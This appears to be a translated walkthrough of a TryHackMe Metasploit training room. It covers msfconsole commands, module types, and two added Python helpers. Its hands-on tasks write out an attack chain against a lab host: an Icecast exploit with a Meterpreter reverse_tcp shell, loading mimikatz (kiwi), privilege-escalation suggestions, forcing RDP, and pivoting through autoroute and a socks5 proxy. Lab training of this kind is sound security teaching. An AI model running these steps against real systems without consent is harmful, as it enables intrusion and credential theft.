Room name: Metasploit
Task.1 Intro
Q1.Kali and most other security distributions of Linux include Metasploit by default. If you are using a different distribution of Linux, verify that you have it installed or install it from the Rapid 7 Github repository.
Install Metasploit and make sure it is ready to run.
Task.2 Initializing…
Q1.First things first, we need to initialize the database! Let’s do that now with the command: msfdb init
Initialize the database by entering the following command:
sudo msfdb init
Q2.Before starting Metasploit, we can view some of the advanced options we can trigger for starting the console. Check these out now by using the command: msfconsole -h
Enter the following command to view the available options:
msfconsole -h
The help output, translated:
msfconsole -h
Usage: msfconsole [options]
Common options:
-E, --environment ENVIRONMENT Set the Rails environment, defaults to the RAIL_ENV environment variable or 'production'
Database options:
-M, --migration-path DIRECTORY Specify a directory containing additional database migrations
-n, --no-database Disable database support
-y, --yaml PATH Specify a YAML file containing database settings
Framework options:
-c FILE Load the specified configuration file
-v, -V, --version Show version
Module options:
--defer-module-loads Defer module loading unless explicitly asked
-m, --module-path DIRECTORY Load an additional module path
Console options:
-a, --ask Ask before exiting Metasploit or accept 'exit -y'
-H, --history-file FILE Save command history to the specified file
-L, --real-readline Use the system Readline library instead of RbReadline
-o, --output FILE Output to the specified file
-p, --plugin PLUGIN Load a plugin on startup
-q, --quiet Do not print the banner on startup
-r, --resource FILE Execute the specified resource file (- for stdin)
-x, --execute-command COMMAND Execute the specified console commands (use ; for multiple)
-h, --help Show this message
Q3.We can start the Metasploit console on the command line without showing the banner or any startup information as well. What switch do we add to msfconsole to start it without showing this information? This will include the ‘-‘
A:-q
Which switch suppresses msfconsole's startup output? Normally msfconsole prints a randomly chosen banner image and some startup information; to skip it, use -q.
Without -q:
With -q:
Q4.Once the database is initialized, go ahead and start Metasploit via the command: msfconsole
Enter the following command to start msfconsole:
msfconsole
Q5.After Metasploit has started, let’s go ahead and check that we’ve connected to the database. Do this now with the command: db_status
Enter the following command to check that the database is connected correctly:
db_status
Q6.Cool! We’ve connected to the database, which type of database does Metasploit 5 use?
A:PostgreSQL
Which kind of database does Metasploit 5 use?
Task.3 Rock ’em to the Core [Commands]
Q1.Let’s go ahead and start exploring the help menu. On the Metasploit prompt (where we’ll be at after we start Metasploit using msfconsole), type the command: help
Enter the following command to explore Metasploit's help menu:
help
Q2.The help menu has a very short one-character alias, what is it?
A:?
The help menu has a very short one-character alias; what is it?
Q3.Finding various modules we have at our disposal within Metasploit is one of the most common commands we will leverage in the framework. What is the base command we use for searching?
A:search
What is the search command in Metasploit?
Q4.Once we’ve found the module we want to leverage, what command we use to select it as the active module?
A:use
How do we select the module we want to use?
Q5.How about if we want to view information about either a specific module or just the active one we have selected?
A:info
How do we view information about a specific module?
Q6.Metasploit has a built-in netcat-like function where we can make a quick connection with a host simply to verify that we can ‘talk’ to it. What command is this?
A:connect
Metasploit has a netcat-like function that lets us verify a host is alive; what is this command?
Q7.Entirely one of the commands purely utilized for fun, what command displays the motd/ascii art we see when we start msfconsole (without -q flag)?
A:banner
Which command displays the artwork shown when msfconsole starts?
Q8.We’ll revisit these next two commands shortly, however, they’re two of the most used commands within Metasploit. First, what command do we use to change the value of a variable?
A:set
Which command changes the value of a variable?
Q9.Metasploit supports the use of global variables, something which is incredibly useful when you’re specifically focusing on a single box. What command changes the value of a variable globally?
A:setg
Which command changes the value of a global variable?
Q10.Now that we’ve learned how to change the value of variables, how do we view them? There are technically several answers to this question, however, I’m looking for a specific three-letter command which is used to view the value of single variables.
A:get
Which command views the value of a single variable?
Q11.How about changing the value of a variable to null/no value?
A:unset
Which command sets a variable's value to null?
Q12.When performing a penetration test it’s quite common to record your screen either for further review or for providing evidence of any actions taken. This is often coupled with the collection of console output to a file as it can be incredibly useful to grep for different pieces of information output to the screen. What command can we use to set our console output to save to a file?
A:spool
Which command saves console output to a file?
Q13.Leaving a Metasploit console running isn’t always convenient and it can be helpful to have all of our previously set values load when starting up Metasploit. What command can we use to store the settings/active datastores from Metasploit to a settings file? This will save within your msf4 (or msf5) directory and can be undone easily by simply removing the created settings file.
A:save
Which command saves the active datastore? (It can be reset by deleting /home/<Username>/.msf4/config.)
Task.4 Modules for Every Occasion!
Metasploit is made up of six main module types.
Q1.Easily the most common module utilized, which module holds all of the exploit code we will use?
A:exploit
Which module holds all of the exploit code we use?
Q2.Used hand in hand with exploits, which module contains the various bits of shellcode we send to have executed following exploitation?
A:payload
Which module is used together with exploit? (It usually runs after the exploit.)
Q3.Which module is most commonly used in scanning and verification machines are exploitable? This is not the same as the actual exploitation of course.
A:Auxiliary
Which module is used to scan whether a target has exploitable vulnerabilities?
Q4.One of the most common activities after exploitation is looting and pivoting. Which module provides these capabilities?
A:Post
Which module provides looting and pivoting capabilities?
Q5.Commonly utilized in payload obfuscation, which module allows us to modify the ‘appearance’ of our exploit such that we may avoid signature detection?
A:Encoder
Which module changes the appearance of an exploit to evade detection?
Q6.Last but not least, which module is used with buffer overflow and ROP attacks?
A:NOP
Which module is used with buffer overflow and ROP attacks?
Q7.Not every module is loaded in by default, what command can we use to load different modules?
A:load
Which command loads modules that are not loaded by default?
Task.5 Move that shell!!
Hands-on work starts here.
Q1.Metasploit comes with a built-in way to run nmap and feed it’s results directly into our database. Let’s run that now by using the command db_nmap -sV <IP>
Enter the following command to run nmap:
db_nmap -sV <IP>
Q2.What service does nmap identify running on port 135?
A:msrpc
What is the name of the service on port 135?
Q3.Let’s go ahead and see what information we have collected in the database. Try typing the command hosts into the msfconsole now.
Enter the following command to see what has been collected so far:
hosts
Q4.How about something else from the database, try the command services now.
Enter the following command to see what else is in the database:
services
Q5.One last thing, try the command vulns now. This won’t show much at the current moment, however, it’s worth noting that Metasploit will keep track of discovered vulnerabilities. One of the many ways the database can be leveraged quickly and powerfully.
Enter the following command to view the vulnerabilities discovered so far:
vulns
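db_nmap works by running nmap with XML output and importing that report into Metasploit's database, which is what the hosts and services commands later print. The following added example (not code from the TryHackMe room or from this write-up) parses a constructed nmap XML report with Python's standard library and builds the same two views, so you can see exactly what the database has to extract; the host address, hostname, OS match and ports in the sample are made-up values.

```python
"""Added example (not part of the TryHackMe room or the original write-up).

db_nmap imports nmap's XML report into Metasploit's database; `hosts` and
`services` then print what was imported. This script parses nmap XML with
the standard library and prints the same two views. The XML below is a
constructed sample modelled on nmap's report format, not a real scan.
"""
import xml.etree.ElementTree as ET

# Constructed sample report: one host, two open ports, one filtered port.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX - 10.10.10.10">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="10.10.10.10" addrtype="ipv4"/>
    <hostnames><hostname name="target.example" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="135">
        <state state="open" reason="syn-ack"/>
        <service name="msrpc" product="Microsoft Windows RPC" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="8000">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Icecast streaming media server" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="filtered" reason="no-response"/>
        <service name="microsoft-ds" method="table" conf="3"/>
      </port>
    </ports>
    <os><osmatch name="Microsoft Windows 7" accuracy="95"/></os>
  </host>
</nmaprun>
"""

def parse_nmap_xml(xml_text):
    """Return (hosts, services) lists of dicts in the spirit of msfconsole's
    `hosts` and `services` tables. Only hosts reported 'up' are imported."""
    root = ET.fromstring(xml_text)
    hosts, services = [], []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        name_el = host.find("hostnames/hostname")
        os_el = host.find("os/osmatch")
        hosts.append({
            "address": addr,
            "name": name_el.get("name") if name_el is not None else "",
            "os_name": os_el.get("name") if os_el is not None else "",
        })
        for port in host.findall("ports/port"):
            state = port.find("state")
            svc = port.find("service")
            services.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": state.get("state") if state is not None else "unknown",
                "name": svc.get("name") if svc is not None else "",
                "info": svc.get("product", "") if svc is not None else "",
            })
    return hosts, services

def service_on_port(services, port, proto="tcp"):
    """Answer the room's kind of question ('what runs on port 135?') from
    the parsed data; returns None if the port was not seen."""
    for s in services:
        if s["port"] == port and s["proto"] == proto:
            return s["name"]
    return None

def print_tables(hosts, services):
    """Print hosts and services roughly the way msfconsole does."""
    print("Hosts")
    for h in hosts:
        print(f"  {h['address']:<16} {h['name']:<16} {h['os_name']}")
    print("Services")
    for s in services:
        print(f"  {s['host']:<16} {s['port']:>5}/{s['proto']} "
              f"{s['state']:<9} {s['name']:<13} {s['info']}")

if __name__ == "__main__":
    print_tables(*parse_nmap_xml(SAMPLE_NMAP_XML))
```

Note that the filtered port is kept in the services view with its state, the same way Metasploit records non-open ports; when reviewing a scan, filter on state before drawing conclusions about what is actually reachable.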
Q6.Now that we’ve scanned our victim system, let’s try connecting to it with a Metasploit payload. First, we’ll have to search for the target payload. In Metasploit 5 (the most recent version at the time of writing) you can simply type use followed by a unique string found within only the target exploit. For example, try this out now with the following command use icecast. What is the full path for our exploit that now appears on the msfconsole prompt? *This will include the exploit section at the start
A:exploit/windows/http/icecast_header
Use the icecast_header module: enter the following command to find and select it:
use icecast
Next the room asks us to use a different module, so we search for it first and then select it:
search multi/handler
Then select result number 6:
use 6
Q7.What is the name of the column on the far left side of the console that shows up next to ‘Name’?
A:#
What is shown in the far-left column?
Q8.Now type the command use NUMBER_FROM_PREVIOUS_QUESTION. This is the short way to use modules returned by search results.
Enter the following command to select the module:
use <Number>
Q9.Next, let’s set the payload using this command set PAYLOAD windows/meterpreter/reverse_tcp. In this way, we can modify which payloads we want to use with our exploits. Additionally, let’s run this command set LHOST YOUR_IP_ON_TRYHACKME. You might have to check your IP using the command ip addr, it will likely be your tun0 interface.
Change the payload:
set payload windows/meterpreter/reverse_tcp
Set the local IP:
set lhost <IP>
Q10.Let’s go ahead and return to our previous exploit, run the command use icecast to select it again.
Then return to the icecast module from before:
use icecast
Q11.One last step before we can run our exploit. Run the command set RHOSTS <IP> to tell Metasploit which target to attack.
Before running the exploit, every option marked Required = yes must be filled in, otherwise the module will not run correctly:
show options
We can see that RHOSTS has not been set:
set rhosts <IP>
Check once more:
show options
Q12.Once you’re set those variables correctly, run the exploit now via either the command exploit or the command run -j to run this as a job. Okay.
Everything is ready. Let's go!
exploit
The exploit succeeded and the initial reverse shell is established.
Q13.Once we’ve started this, we can check all of the jobs running on the system by running the command jobs
Enter jobs to check all jobs running on the system, but first we have to return to the msfconsole prompt:
CTRL+Z
jobs
Q14.After we’ve established our connection in the next task, we can list all of our sessions using the command sessions. Similarly, we can interact with a target session using the command sessions -i SESSION_NUMBER
Enter the following command to list all connected sessions:
sessions
Then put the session number shown above into the following command to return to the reverse shell:
sessions <Number>
Task.6 We’re in, now what?
Q1.First things first, our initial shell/process typically isn’t very stable. Let’s go ahead and attempt to move to a different process. First, let’s list the processes using the command ps. What’s the name of the spool service?
A:spoolsv.exe
What is the name of the spool process? Because our initial reverse shell is usually not very stable, we need to migrate the shell into another process.
ps
ps lists all running processes; we can see that the spool process is named spoolsv.exe.
Q2.Let’s go ahead and move into the spool process or at least attempt to! What command do we use to transfer ourselves into the process? This won’t work at the current time as we don’t have sufficient privileges but we can still try!
A:migrate
Migrates the shell into that process (although we do not have sufficient privileges right now).
Q3.Well that migration didn’t work, let’s find out some more information about the system so we can try to elevate. What command can we run to find out more information regarding the current user running the process we are in?
A:getuid
Which command shows information about the current user?
Q4.How about finding more information out about the system itself?
A:sysinfo
Which command shows detailed system information?
Q5.This might take a little bit of googling, what do we run to load mimikatz (more specifically the new version of mimikatz) so we can use it?
A:load kiwi
How do we load mimikatz?
Q6.Let’s go ahead and figure out the privileges of our current user, what command do we run?
A:getprivs
Which command tells us the current user's privileges?
Q7.What command do we run to transfer files to our victim computer?
A:upload
Which command uploads files to the target computer?
Q8.How about if we want to run a Metasploit module?
A:run
Which command runs a Metasploit module?
Q9.A simple question but still quite necessary, what command do we run to figure out the networking information and interfaces on our victim?
A:ipconfig
Which command lists the target's network information?
Q10.Let’s go ahead and run a few post modules from Metasploit. First, let’s run the command run post/windows/gather/checkvm. This will determine if we’re in a VM, a very useful piece of knowledge for further pivoting.
Run the checkvm module to determine whether the target is a VM:
run post/windows/gather/checkvm
Q11.Next, let’s try: run post/multi/recon/local_exploit_suggester. This will check for various exploits which we can run within our session to elevate our privileges. Feel free to experiment using these suggestions, however, we’ll be going through this in greater detail in the room Ice.
Next run local_exploit_suggester to look for exploits that could elevate our privileges:
run post/multi/recon/local_exploit_suggester
Q12.Finally, let’s try forcing RDP to be available. This won’t work since we aren’t administrators, however, this is a fun command to know about: run post/windows/manage/enable_rdp
Finally, use enable_rdp to try to force RDP on:
run post/windows/manage/enable_rdp
Q13.One quick extra question, what command can we run in our meterpreter session to spawn a normal system shell?
A:shell
Which command spawns a normal system shell?
Task.7 Makin’ Cisco Proud
Q1.Let’s go ahead and run the command run autoroute -h, this will pull up the help menu for autoroute. What command do we run to add a route to the following subnet: 172.18.1.0/24? Use the -n flag in your answer.
A:run autoroute -s 172.18.1.0 -n 255.255.255.0
How do we add a route to the following subnet: 172.18.1.0?
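autoroute takes the subnet and the netmask as separate arguments (-s and -n), while the question gives the target network in CIDR form, so the answer above is really a conversion of /24 into 255.255.255.0. The following added example (my own helper, not from the room or this write-up) performs that conversion for any IPv4 CIDR using Python's standard ipaddress module, rejects a network whose host bits are set (a common way to end up routing the wrong subnet), and includes a small check of which addresses a given route would cover, which is useful when reviewing what a compromised host was able to reach.

```python
"""Added example (not part of the TryHackMe room or the original write-up).

Converts a CIDR subnet into the -s/-n argument pair that autoroute expects
and builds the command string; for 172.18.1.0/24 it reproduces the room's
answer. Uses only the standard library.
"""
import ipaddress

def cidr_to_autoroute_args(cidr):
    """Return (subnet, netmask) for a CIDR string such as '172.18.1.0/24'.
    strict=True makes ipaddress raise ValueError for inputs like
    172.18.1.5/24, whose host bits are set."""
    net = ipaddress.ip_network(cidr, strict=True)
    if net.version != 4:
        raise ValueError("autoroute -n expects an IPv4 dotted netmask")
    return str(net.network_address), str(net.netmask)

def autoroute_command(cidr):
    """Build the meterpreter command the room asks for, e.g.
    'run autoroute -s 172.18.1.0 -n 255.255.255.0'."""
    subnet, mask = cidr_to_autoroute_args(cidr)
    return f"run autoroute -s {subnet} -n {mask}"

def route_covers(cidr, host):
    """Review helper: would a route for `cidr` carry traffic for `host`
    through the pivot session?"""
    return ipaddress.ip_address(host) in ipaddress.ip_network(cidr, strict=True)

if __name__ == "__main__":
    print(autoroute_command("172.18.1.0/24"))
    print(route_covers("172.18.1.0/24", "172.18.1.77"))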
Q2.Additionally, we can start a socks5 proxy server out of this session. Background our current meterpreter session and run the command search server/socks5. What is the full path to the socks5 auxiliary module?
A:auxiliary/server/socks5
We can start a socks5 proxy server out of this session:
CTRL+Z
search server/socks5
Q3.Once we’ve started a socks server we can modify our /etc/proxychains.conf file to include our new server. What command do we prefix our commands (outside of Metasploit) to run them through our socks5 server with proxychains?
A:proxychains
Once we have started the socks server, we can add it to /etc/proxychains.conf. What do we prefix our commands with (outside of Metasploit) to run them through our socks5 server with proxychains?
Thoughts:
This one was really long and took me a very long time (from 3:30 to 6:00). I think this room is very useful for anyone who has never touched msfconsole; you learn Metasploit's basic operations and related knowledge, but some of the more advanced things don't seem to be covered much? Perhaps it takes the penetration-testing rooms to become familiar with the advanced steps.
Disclaimer
Attacking targets without prior mutual consent is illegal. Please comply with local laws. The developers and the author accept no responsibility for this tool and are not liable for any misuse or damage.
This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period.